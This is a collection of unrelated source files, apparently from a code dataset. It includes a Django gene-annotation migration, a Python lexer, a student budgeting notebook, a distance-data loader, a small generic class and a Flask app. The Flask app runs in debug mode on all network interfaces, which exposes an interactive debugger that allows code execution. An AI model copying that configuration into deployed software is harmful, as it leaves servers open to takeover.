('gene_symbol', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('release', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationrelease')),
],
options={
'unique_together': {('release', 'gene_symbol')},
},
),
migrations.CreateModel(
name='Transcript',
fields=[
('identifier', models.TextField(primary_key=True, serialize=False)),
('annotation_consortium', models.CharField(choices=[('R', 'RefSeq'), ('E', 'Ensembl')], max_length=1)),
],
),
migrations.CreateModel(
name='TranscriptVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.IntegerField()),
('biotype', models.TextField(null=True)),
('data', models.JSONField(blank=True, default=library.utils.empty_dict)),
('gene_version', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneversion')),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
('import_source', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationimport')),
('transcript', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
],
options={
'unique_together': {('transcript', 'version', 'genome_build')},
},
bases=(library.django_utils.SortByPKMixin, models.Model),
),
migrations.CreateModel(
name='ProteinDomainTranscriptVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start', models.IntegerField()),
('end', models.IntegerField()),
('protein_domain', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.proteindomain')),
('transcript_version', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.transcriptversion')),
],
),
migrations.CreateModel(
name='PfamSequenceIdentifier',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pfam_sequence', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.pfamsequence')),
('transcript', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
('transcript_version', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.transcriptversion')),
],
),
migrations.CreateModel(
name='PfamDomains',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start', models.IntegerField()),
('end', models.IntegerField()),
('pfam', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.pfam')),
('pfam_sequence', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.pfamsequence')),
],
),
migrations.CreateModel(
name='PanelAppPanelRelevantDisorders',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('panel_app_panel', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.panelapppanel')),
],
),
migrations.CreateModel(
name='HGNCGeneNames',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('approved_symbol', models.TextField()),
('approved_name', models.TextField()),
('status', models.CharField(choices=[('A', 'Approved'), ('S', 'Symbol Withdrawn'), ('E', 'Entry Withdrawn')], max_length=1)),
('previous_symbols', models.TextField()),
('synonyms', models.TextField()),
('refseq_ids', models.TextField()),
('hgnc_import', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.hgncgenenamesimport')),
],
),
migrations.CreateModel(
name='GnomADGeneConstraint',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('oe_lof', models.FloatField(null=True)),
('oe_lof_lower', models.FloatField(null=True)),
('oe_lof_upper', models.FloatField(null=True)),
('cached_web_resource', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='annotation.cachedwebresource')),
('gene', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.gene')),
('gene_symbol', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('transcript', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
],
),
migrations.AddField(
model_name='geneversion',
name='hgnc',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.hgncgenenames'),
),
migrations.AddField(
model_name='geneversion',
name='import_source',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationimport'),
),
migrations.CreateModel(
name='GeneSymbolWiki',
fields=[
('wiki_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='snpdb.wiki')),
('gene_symbol', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
bases=('snpdb.wiki',),
),
migrations.CreateModel(
name='GeneSymbolAlias',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('alias', models.TextField(unique=True)),
('source', models.CharField(choices=[('N', 'NCBI'), ('U', 'UCSC'), ('H', 'HGNC'), ('M', 'Manual')], max_length=1)),
('description', models.TextField(null=True)),
('gene_symbol', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
),
migrations.CreateModel(
name='GeneListWiki',
fields=[
('wiki_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='snpdb.wiki')),
('gene_list', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='genes.genelist')),
],
options={
'get_latest_by': 'modified',
'abstract': False,
},
bases=('snpdb.wiki',),
),
migrations.CreateModel(
name='GeneListCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.TextField()),
('icon_css_class', models.TextField(blank=True)),
('hidden', models.BooleanField(default=False)),
('public', models.BooleanField(default=False)),
('description', models.TextField()),
('company', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='snpdb.company')),
],
),
migrations.AddField(
model_name='genelist',
name='category',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genelistcategory'),
),
migrations.AddField(
model_name='genelist',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.CreateModel(
name='GeneInfo',
fields=[
('name', models.TextField(primary_key=True, serialize=False)),
('description', models.TextField(blank=True)),
('icon_css_class', models.TextField()),
('gene_list', models.OneToOneField(null=True, on_delete=django.db.models.deletion.PROTECT, to='genes.genelist')),
],
),
migrations.CreateModel(
name='GeneCoverageCollection',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('path', models.TextField()),
('data_state', models.CharField(choices=[('N', 'Non Existent'), ('D', 'Deleted'), ('R', 'Running'), ('S', 'Skipped'), ('E', 'Error'), ('C', 'Complete')], max_length=1)),
('genome_build', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.genomebuild')),
],
),
migrations.CreateModel(
name='GeneCoverageCanonicalTranscript',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('original_gene_symbol', models.TextField()),
('original_transcript_id', models.TextField()),
('min', models.IntegerField()),
('mean', models.FloatField()),
('std_dev', models.FloatField()),
('percent_0x', models.FloatField()),
('percent_10x', models.FloatField(null=True)),
('percent_20x', models.FloatField()),
('percent_100x', models.FloatField(null=True)),
('sensitivity', models.FloatField()),
('canonical_transcript_collection', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='genes.canonicaltranscriptcollection')),
('gene_coverage_collection', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genecoveragecollection')),
('gene_symbol', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('transcript', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='GeneCoverage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('original_gene_symbol', models.TextField()),
('original_transcript_id', models.TextField()),
('min', models.IntegerField()),
('mean', models.FloatField()),
('std_dev', models.FloatField()),
('percent_0x', models.FloatField()),
('percent_10x', models.FloatField(null=True)),
('percent_20x', models.FloatField()),
('percent_100x', models.FloatField(null=True)),
('sensitivity', models.FloatField()),
('gene_coverage_collection', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genecoveragecollection')),
('gene_symbol', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('transcript', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='CustomTextGeneList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('md5_hash', models.CharField(max_length=32)),
('name', models.TextField()),
('text', models.TextField()),
('gene_list', models.OneToOneField(null=True, on_delete=django.db.models.deletion.SET_NULL, to='genes.genelist')),
],
),
migrations.CreateModel(
name='CanonicalTranscript',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('original_gene_symbol', models.TextField()),
('original_transcript_id', models.TextField()),
('collection', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.canonicaltranscriptcollection')),
('gene_symbol', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('transcript', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.transcript')),
],
),
migrations.CreateModel(
name='CachedThirdPartyGeneList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('cached_web_resource', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='annotation.cachedwebresource')),
('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='snpdb.company')),
],
),
migrations.CreateModel(
name='ReleaseTranscriptVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('release', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationrelease')),
('transcript_version', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.transcriptversion')),
],
options={
'unique_together': {('release', 'transcript_version')},
},
),
migrations.CreateModel(
name='ReleaseGeneVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('gene_version', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneversion')),
('release', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.geneannotationrelease')),
],
options={
'unique_together': {('release', 'gene_version')},
},
),
migrations.CreateModel(
name='ReleaseGeneSymbolGene',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='created')),
('modified', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='modified')),
('match_info', models.TextField(null=True)),
('gene', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.gene')),
('release_gene_symbol', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.releasegenesymbol')),
],
options={
'unique_together': {('release_gene_symbol', 'gene')},
},
),
migrations.AlterUniqueTogether(
name='geneversion',
unique_together={('gene', 'version', 'genome_build')},
),
migrations.CreateModel(
name='GeneListGeneSymbol',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('original_name', models.TextField(blank=True, null=True)),
('modification_info', models.TextField(null=True)),
('gene_list', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='genes.genelist')),
('gene_symbol', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbol')),
('gene_symbol_alias', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='genes.genesymbolalias')),
],
options={
'unique_together': {('gene_list', 'original_name')},
},
),
]
<filename>src/mau/lexers/base_lexer.py
import re
import string
from functools import partial
from collections.abc import Sequence
from mau import text_buffer
class TokenTypes:
EOL = "EOL"
EOF = "EOF"
LITERAL = "LITERAL"
TEXT = "TEXT"
WHITESPACE = "WHITESPACE"
class LexerError(ValueError):
pass
class TokenError(ValueError):
pass
class Token:
def __init__(self, _type, value=None, position=None):
self.type = _type
self.value = str(value) if value is not None else None
self.position = position
def __str__(self):
position_string = ""
if self.position:
position_string = f", line={self.position[0]}, col={self.position[1]}"
value_string = ""
if self.value is not None:
value_string = f", '{self.value}'"
return f"Token({self.type}{value_string}{position_string})"
__repr__ = __str__
def __eq__(self, other):
if other.value is None:
return self.type == other.type
return (self.type, self.value) == (
other.type,
other.value,
)
def __hash__(self):
return hash((self.type, self.value))
def __len__(self):
if self.value:
return len(self.value)
return 0
def __bool__(self):
return True
EOL = Token(TokenTypes.EOL)
EOF = Token(TokenTypes.EOF)
WS = partial(Token, TokenTypes.WHITESPACE)
Text = partial(Token, TokenTypes.TEXT)
Literal = partial(Token, TokenTypes.LITERAL)
class BaseLexer:
def __init__(self, initial_position=None):
self._text_buffer = text_buffer.TextBuffer()
self._text_buffer.position
self._buffer = []
self._initial_position = initial_position or (0, 0)
self.tokens = []
@property
def _token_position(self):
return tuple(map(sum, zip(self._text_buffer.position, self._initial_position)))
def process(self, text):
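        # Tokenise `text` from scratch: reset the token list, load the text buffer, and
        # keep calling _process() until an EOF token has been appended.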
self.tokens = []
self.index = -1
self._text_buffer.load(text)
self._process()
        while self.tokens[-1].type != TokenTypes.EOF:
self._process()
def _process(self):
# This should not be touched by child classes
# as it is the core of the lexer. It tries
# each function in the list returned by
# _process_functions and stores all the resulting
# tokens. A parsing function must return None
# when characters do not match the rules.
process_functions = self._process_functions()
process_functions.append(self._process_error)
for process_func in process_functions:
result = self._wrap(process_func())
if result is None:
continue
self.tokens.extend(result)
return
def _wrap(self, result):
# Makes sure the result is either None or a list of tokens
if result is None:
return
if not isinstance(result, Sequence):
return [result]
return result
def _nextline(self):
# Carriage return =)
self._initial_position = (self._initial_position[0], 0)
# Skip the whole line including the EOL
self._text_buffer.nextline()
def _skip(self, steps=1):
# Skip only the given amount of characters
self._text_buffer.skip(steps)
@property
def _current_char(self):
return self._text_buffer.current_char
@property
def _current_line(self):
return self._text_buffer.current_line
@property
def _tail(self):
return self._text_buffer.tail
def _create_token(self, token_type, token_value=None):
return Token(token_type, token_value, position=self._token_position)
def _create_token_and_skip(self, token_type, token_value=None, skip_value=None):
skip = next(x for x in [skip_value, token_value, ""] if x is not None)
token = self._create_token(token_type, token_value)
if token_type == TokenTypes.EOL:
self._nextline()
else:
self._skip(len(skip))
return token
def _store(self, token_type, token_value=None, skip_value=None):
self._buffer.append(
self._create_token_and_skip(token_type, token_value, skip_value)
)
def _pop(self):
tokens = list(self._buffer)
self._buffer = []
return tokens
def _process_eof(self):
try:
self._current_line
except text_buffer.EOFError:
return self._create_token_and_skip(TokenTypes.EOF)
def _process_eol(self):
try:
self._current_char
except text_buffer.EOLError:
return self._create_token_and_skip(TokenTypes.EOL)
def _process_character(self):
if self._current_char not in string.ascii_letters:
return None
self._store(TokenTypes.TEXT, self._current_char)
return self._pop()
def _process_whitespace(self):
regexp = re.compile(r"\ +")
match = regexp.match(self._tail)
if not match:
return None
self._store(TokenTypes.WHITESPACE, match.group())
return self._pop()
def _process_functions(self):
return [
self._process_eof,
self._process_eol,
self._process_whitespace,
self._process_character,
]
def _process_error(self):
raise LexerError(f'Can\'t process "{self._tail}"')
| StarcoderdataPython |
1655628 | <reponame>BryceHaley/curriculum-jbook<gh_stars>1-10

<a href="https://hub.callysto.ca/jupyter/hub/user-redirect/git-pull?repo=https%3A%2F%2Fgithub.com%2Fcallysto%2Fcurriculum-notebooks&branch=master&subPath=Health/CALM/CALM-moving-out-6.ipynb&depth=1" target="_parent"><img src="https://raw.githubusercontent.com/callysto/curriculum-notebooks/master/open-in-callysto-button.svg?sanitize=true" width="123" height="24" alt="Open in Callysto"/></a>
# CALM - Moving Out 6
## Part 6 - Food and Supplies
📙In this section we will consider food and household supplies that you will need. You will be using [dataframes from a Python library called pandas](https://pandas.pydata.org/pandas-docs/stable/getting_started/dsintro.html#dataframe). These dataframes are like spreadsheets, and the code will look a little complicated, but it shouldn't be too bad.
### Meal Plan
Before we get into dataframes, though, you need to create a meal plan. With the [Canadian Food Guide](https://food-guide.canada.ca/en/food-guide-snapshot/) in mind, complete a 7-day meal plan considering nutritionally balanced choices at each meal. You can choose to eat out only twice on this menu.
You will then use this to decide your grocery needs for one week.
Replace the words "meal" in the cell below with the meals you plan to eat, then run the cell to store your plan.
%%writefile moving_out_8.txt
✏️
|Day|Breakfast|Lunch|Dinner|
|-|-|-|-|
|Monday| meal | meal | meal |
|Tuesday| meal | meal | meal |
|Wednesday| meal | meal | meal |
|Thursday| meal | meal | meal |
|Friday| meal | meal | meal |
|Saturday| meal | meal | meal |
|Sunday| meal | meal | meal |
### Food Shopping
📙From your meal plan make a shopping list of food needed to prepare three meals a day for one week. Research the price of these food items by going to grocery store websites, using grocery fliers, going to the grocery store, or reviewing receipts or bills with your family. Buying items in bulk is usually more economical in the long run, but for this exercise you only require food for one week so choose the smallest quantities possible.
`Run` the following cell to generate a data table that you can then edit.
Double-click on the "nan" values to put in your information. Use the "Add Row" and "Remove Row" buttons if necessary.
import pandas as pd
import qgrid
foodItemList = ['Vegetables','Fruit','Protein','Whole Grains','Snacks','Restaurant Meal 1','Restaurant Meal 2']
foodColumns = ['Size','Quantity','Price']
foodIndex = range(1,len(foodItemList)+1)
dfFood = pd.DataFrame(index=pd.Series(foodIndex), columns=pd.Series(foodColumns))
dfFood.insert(0,'Item(s)',foodItemList,True)
dfFood['Quantity'] = 1
dfFood['Price'] = 1
dfFoodWidget = qgrid.QgridWidget(df=dfFood, show_toolbar=True)
dfFoodWidget
📙After you have added data to the table above, `Run` the next cell to calculate your food costs for the month. It adds up weekly food costs and multiplies by 4.3 weeks per month.
foodShoppingList = dfFoodWidget.get_changed_df()
foodPrices = pd.to_numeric(foodShoppingList['Price'])
weeklyFoodCost = foodPrices.sum()
monthlyFoodCost = weeklyFoodCost * 4.3
%store monthlyFoodCost
print('That is about $' + str(weeklyFoodCost) + ' per week for food.')
print('Your food for the month will cost about $' + str('{:.2f}'.format(monthlyFoodCost)) + '.')
### Household Supplies and Personal Items
📙The following is a typical list of household and personal items. Add any additional items you feel you need and delete items you don’t need. Look for smaller quantities with a **one-month** budget in mind, or adjust pricing if buying in bulk.
`Run` the next cell to generate a data table that you can then edit.
householdItemList = ['Toilet Paper','Tissues','Paper Towel',
'Dish Soap','Laundry Detergent','Cleaners',
'Plastic Wrap','Foil','Garbage/Recycling Bags',
'Condiments','Coffee/Tea','Flour','Sugar',
'Shampoo','Conditioner','Soap','Deodorant',
'Toothpaste','Mouthwash','Hair Products','Toothbrush',
'Makeup','Cotton Balls','Shaving Gel','Razors',
]
householdColumns = ['Size','Quantity','Price']
householdIndex = range(1,len(householdItemList)+1)
dfHousehold = pd.DataFrame(index=pd.Series(householdIndex), columns=pd.Series(householdColumns))
dfHousehold.insert(0,'Item(s)',householdItemList,True)
dfHousehold['Quantity'] = 1
dfHousehold['Price'] = 1
dfHouseholdWidget = qgrid.QgridWidget(df=dfHousehold, show_toolbar=True)
dfHouseholdWidget
📙After you have added data to the above data table, `Run` the next cell to calculate your monthly household item costs.
householdShoppingList = dfHouseholdWidget.get_changed_df()
householdPrices = pd.to_numeric(householdShoppingList['Price'])
monthlyHouseholdCost = householdPrices.sum()
%store monthlyHouseholdCost
print('That is about $' + str(monthlyHouseholdCost) + ' per month for household items.')
### Furniture and Equipment
📙Think about items you need for your place. How comfortable do you want to be? Are there items you have already been collecting or that your family is saving for you? Discuss which items they may be willing to give you, decide which items you can do without, which items a roommate may have, and which items you will need to purchase. Although it is nice to have new things, remember household items are often a bargain at garage sales, dollar stores, and thrift stores.
`Run` the next cell to generate a data table that you can edit.
fneItemList = ['Pots and Pans','Glasses','Plates','Bowls',
'Cutlery','Knives','Oven Mitts','Towels','Cloths',
'Toaster','Garbage Cans','Kettle','Table','Kitchen Chairs',
'Broom and Dustpan','Vacuum Cleaner','Clock',
'Bath Towels','Hand Towels','Bath Mat',
'Toilet Brush','Plunger',
'Bed','Dresser','Night Stand','Sheets','Blankets','Pillows',
'Lamps','TV','Electronics','Coffee Table','Couch','Chairs',
]
fneColumns = ['Room','Quantity','Price']
fneIndex = range(1,len(fneItemList)+1)
dfFne = pd.DataFrame(index=pd.Series(fneIndex), columns=pd.Series(fneColumns))
dfFne.insert(0,'Item(s)',fneItemList,True)
dfFne['Quantity'] = 1
dfFne['Price'] = 1
dfFneWidget = qgrid.QgridWidget(df=dfFne, show_toolbar=True)
dfFneWidget
📙Next `Run` the following cell to add up your furniture and equipment costs.
fneList = dfFneWidget.get_changed_df()
fnePrices = pd.to_numeric(fneList['Price'])
fneCost = fnePrices.sum()
%store fneCost
print('That is about $' + str(fneCost) + ' for furniture and equipment items.')
### Clothing
📙When calculating the cost of clothing for yourself, consider the type of work you plan to be doing and how important clothing is to you. Consider how many of each item of clothing you will purchase in a year, and multiply this by the cost per item. Be realistic.
`Run` the next cell to generate an editable data table.
clothingItemList = ['Dress Pants','Skirts','Shirts','Suits/Jackets/Dresses',
'T-Shirts/Tops','Jeans/Pants','Shorts',
'Dress Shoes','Casual Shoes','Running Shoes',
'Outdoor Coats','Boots','Sports Clothing',
'Pajamas','Underwear','Socks','Swimsuits'
]
clothingColumns = ['Quantity Required','Cost per Item']
clothingIndex = range(1,len(clothingItemList)+1)
dfClothing = pd.DataFrame(index=pd.Series(clothingIndex), columns=pd.Series(clothingColumns))
dfClothing.insert(0,'Item(s)',clothingItemList,True)
dfClothing['Quantity Required'] = 1
dfClothing['Cost per Item'] = 1
dfClothingWidget = qgrid.QgridWidget(df=dfClothing, show_toolbar=True)
dfClothingWidget
📙Once you have added data to the above table, `Run` the next cell to add up your clothing costs.
clothingList = dfClothingWidget.get_changed_df()
clothingQuantities = pd.to_numeric(clothingList['Quantity Required'])
clothingPrices = pd.to_numeric(clothingList['Cost per Item'])
clothingList['Total Cost'] = clothingQuantities * clothingPrices
clothingCost = clothingList['Total Cost'].sum()
monthlyClothingCost = clothingCost / 12
%store monthlyClothingCost
print('That is $' + str('{:.2f}'.format(clothingCost)) + ' per year, or about $' + str('{:.2f}'.format(monthlyClothingCost)) + ' per month for clothing.')
clothingList # this displays the table with total cost calculations
### Health Care
📙Most people living and working in Alberta have access to hospital and medical services under the [Alberta Health Care Insurance Plan (AHCIP)](https://www.alberta.ca/ahcip.aspx) paid for by the government. Depending on where you work, your employer may offer additional benefit packages such as Extended Health Care that cover a portion of medical and dental expenses.
If you do not have health benefits from your employer you will have to pay for medications, dental visits, and vision care.
Allow money in your budget for prescriptions and over-the-counter medications.
Budget for the dentist and optometrist. One visit to the dentist, including a check-up, x-rays, and teeth cleaning, is approximately $330. You should see your dentist yearly.
A visit to the optometrist is approximately $120. You should normally see your optometrist once every 2 years, or once a year if you’re wearing contact lenses.
`Run` the next cell to display a data table that you can edit with your expected health costs.
healthItems = [
'Pain Relievers','Bandages','Cough Medicine',
'Prescriptions','Dental Checkup',
'Optometrist','Glasses','Contacts','Contact Solution',
'Physiotherapy','Massage'
]
healthColumns = ['Cost Per Year']
healthIndex = range(1,len(healthItems)+1)
dfHealth = pd.DataFrame(index=pd.Series(healthIndex), columns=pd.Series(healthColumns))
dfHealth.insert(0,'Item or Service',healthItems,True)
dfHealth['Cost Per Year'] = 1
dfHealthWidget = qgrid.QgridWidget(df=dfHealth, show_toolbar=True)
dfHealthWidget
📙`Run` the next cell to add up your health care costs.
healthList = dfHealthWidget.get_changed_df()
healthCost = pd.to_numeric(healthList['Cost Per Year']).sum()
monthlyHealthCost = healthCost / 12
%store monthlyHealthCost
print('That is $' + str('{:.2f}'.format(healthCost)) + ' per year, or about $' + str('{:.2f}'.format(monthlyHealthCost)) + ' per month for health care.')
📙Once again, `Run` the next cell to check that your answers have been stored.
print('Monthly food cost:', monthlyFoodCost)
print('Monthly household items cost:', monthlyHouseholdCost)
print('Furniture and equipment cost:', fneCost)
print('Monthly clothing cost:', monthlyClothingCost)
print('Monthly health cost', monthlyHealthCost)
with open('moving_out_8.txt', 'r') as file8:
print(file8.read())
📙You have now completed this section. Proceed to [section 7](./CALM-moving-out-7.ipynb)
[License](https://github.com/callysto/curriculum-notebooks/blob/master/LICENSE.md)
import os
import pandas as pd
from tqdm import tqdm
def load_tag_info(path):
tag_info = open(path).read()
    # Collapse runs of spaces so that fields end up separated by single spaces
    while '  ' in tag_info:
        tag_info = tag_info.replace('  ', ' ')
tag_info = tag_info.replace(':', '')
tag_info = tag_info.replace(' \n', '\n')
tag_info_list = tag_info.split('\n')
tmp = [[i for i in line.split(' ')] for line in tag_info_list[2:] if ' ' in line]
tag_df = pd.DataFrame(tmp)
tag_df.columns = ['tag_id', 'x', 'y', 'z']
tag_df['tag_id'] = tag_df['tag_id'].astype('int')
for key in ['x', 'y', 'z']:
tag_df[key] = tag_df[key].astype('float')*10.0
return tag_df
def load_distince_data_origin(path):
d1 = open(path).read()
d2 = d1.split('\n')
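    # Keep only lines with exactly 9 colon-separated fields; the column names assigned
    # below (c1, unixtime, c3, tag_id, anchor_id, distance, distance_check, c8,
    # data_index) describe those fields in order.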
d3 = pd.DataFrame([line.split(':') for line in d2 if len(line.split(':')) == 9])
d3.columns = ['c1', 'unixtime', 'c3', 'tag_id', 'anchor_id', 'distance', 'distance_check', 'c8', 'data_index']
d3['tag_id'] = d3['tag_id'].astype('float')
d3['distance'] = d3['distance'].astype('float')
d3['distance_check'] = d3['distance_check'].astype('float')
return d3
def load_distince_data(path):
d3 = load_distince_data_origin(path)
d41 = d3[['data_index', 'anchor_id', 'distance']].pivot(index='data_index', columns='anchor_id', values='distance')
d41.reset_index(inplace=True)
d41.columns = ['data_index', 'dis_0', 'dis_1', 'dis_2', 'dis_3']
d42 = d3[['data_index', 'anchor_id', 'distance_check']].pivot(
index='data_index', columns='anchor_id', values='distance_check')
d42.reset_index(inplace=True)
d42.columns = ['data_index', 'dis_c_0', 'dis_c_1', 'dis_c_2', 'dis_c_3']
d5 = d3[['c1', 'data_index', 'c3', 'tag_id', 'c8', 'unixtime']].groupby(['data_index']).max().reset_index()
d6 = pd.merge(d5, d41, on=['data_index'])
d6 = pd.merge(d6, d42, on=['data_index'])
d6.reset_index(drop=True, inplace=True)
    assert len(d41) == len(d42) == len(d5) == len(d6)
return d6
def load_all_and_merge(path_dir, target_file=None, overwrite=False):
target_file = target_file or f'data/{os.path.basename(path_dir)}.csv'
if not overwrite and os.path.exists(target_file):
return pd.read_csv(target_file)
file_list = os.listdir(path_dir)
file_list = sorted(file_list, key=lambda x: int(x.split('.')[0]))
dfs = []
for file_name in tqdm(file_list):
tag_id = int(file_name.split('.')[0])
path = os.path.join(path_dir, file_name)
df1 = load_distince_data(path)
df1['tag_id'] = tag_id
dfs.append(df1)
res = pd.concat(dfs)
res.to_csv(target_file, index=None)
return res
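# Usage sketch (illustrative, not part of the original file): typical call sequence for
# the loaders above.  The paths are assumptions supplied by the caller, not paths the
# original code defines.
def load_dataset_sketch(tag_info_path, distance_dir):
    """Load anchor/tag coordinates and the merged per-tag distance table."""
    tag_df = load_tag_info(tag_info_path)
    distance_df = load_all_and_merge(distance_dir)
    return tag_df, distance_df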
from dataclasses import dataclass
from types import GenericAlias
from typing import Generic, TypeVar
T = TypeVar("T")
U = TypeVar("U")
@dataclass
class _Point(Generic[T, U]):
x: T
y: U
class _Point_(_Point):
@classmethod
    def __class_getitem__(cls, item):
        return GenericAlias(cls, item)
class _Display_(_Point):
def __repr__(self) -> str:
return f"({self.x}, {self.y})"
class Point(
_Display_,
_Point_,
_Point,
Generic[T, U],
):
def __init__(self, x: T, y: U):
super(Point, self).__init__(x, y)
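# Illustrative usage (not part of the original file): Point combines the dataclass
# fields from _Point with the custom __repr__ from _Display_.
if __name__ == "__main__":
    point = Point(1, 2.5)   # T inferred as int, U as float
    print(point)            # prints "(1, 2.5)" via _Display_.__repr__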
from flask import Flask
from flask import render_template
app = Flask(__name__)
app.config.update(
DEBUG=True,
SEND_FILE_MAX_AGE_DEFAULT=0
)
@app.route('/')
def index():
return render_template('index.html')
if __name__ == "__main__":
app.run(host='0.0.0.0', debug=True, port=80)
from __future__ import unicode_literals
import json
from django.db import models
from django.utils.six import text_type as str
from django.utils.translation import ugettext_lazy as _
from django.urls import reverse
from django.utils import timezone
from django.contrib.auth.models import (AbstractBaseUser, PermissionsMixin,
BaseUserManager)
from django.contrib.auth.validators import UnicodeUsernameValidator
from django.utils.encoding import python_2_unicode_compatible
from oauth2_provider.models import AbstractApplication
from froide.helper.csv_utils import export_csv, get_dict
class UserManager(BaseUserManager):
def _create_user(self, email, username, password,
is_staff, is_superuser, **extra_fields):
"""
Creates and saves a User with the given email and password.
"""
now = timezone.now()
if not email:
raise ValueError('The given email must be set')
email = self.normalize_email(email)
if not username:
raise ValueError('The given username must be set')
username = self.model.normalize_username(username)
user = self.model(email=email,
is_staff=is_staff, is_active=True,
is_superuser=is_superuser, last_login=now,
date_joined=now, **extra_fields)
